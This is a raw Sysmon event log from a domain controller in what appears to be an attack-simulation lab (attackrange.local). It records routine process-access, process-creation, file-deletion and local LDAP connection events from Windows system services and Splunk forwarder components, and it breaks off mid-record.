21:02:53.203{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.203{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.203{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.203{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A17D-60D3-1303-00000000CF01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.203{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A17D-60D3-1303-00000000CF01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.078{4DB9351A-A17D-60D3-1303-00000000CF01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17E-60D3-1603-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.929{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17E-60D3-1603-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.929{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17E-60D3-1603-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.897{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1281419817301D9DA09B0FC4997C22AA,SHA256=374B24C442B2A975F71D8E5035B21D61299474BC27DB66F8A84FAE10707F3775,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A17E-60D3-1503-00000000CF01}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17E-60D3-1503-00000000CF01}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.851{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A17E-60D3-1503-00000000CF01}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.721{4DB9351A-A17E-60D3-1503-00000000CF01}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.819{4DB9351A-A17C-60D3-1203-00000000CF01}6732NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3U6SHY6IZ9\WindowsBase.ni.dll.auxMD5=1092B21F673909592A952203B9783282,SHA256=C41AFD7B7F108DF0F94A44DE4789DD5977EB4DCC8C1D1A62759EB1A6B9F43331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.819{4DB9351A-A17C-60D3-1203-00000000CF01}6732NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3U6SHY6IZ9\WindowsBase.ni.dllMD5=F8DF879CEBFABA5BB690C96F6647E400,SHA256=4543F38D30F9276474F9D95A1A7980D4B8DC42876D9C37C24488821017CDB659,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:54.741{4DB9351A-A17C-60D3-1203-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a4c-0\WindowsBase.dll2021-06-23 21:02:54.741 23542300x800000000000000019824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.375{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B14E228E858438D33DB1660364453C,SHA256=B135B81B06B64DB2FE6A0F73507134E18A099E9EB911AD69FA898188BEC1608E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.569{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61399-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000019822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.569{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61399-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000019821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.163{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61398-false10.0.1.12-8000- 10341000x800000000000000019820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.218{4DB9351A-A17D-60D3-1403-00000000CF01}71242244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program 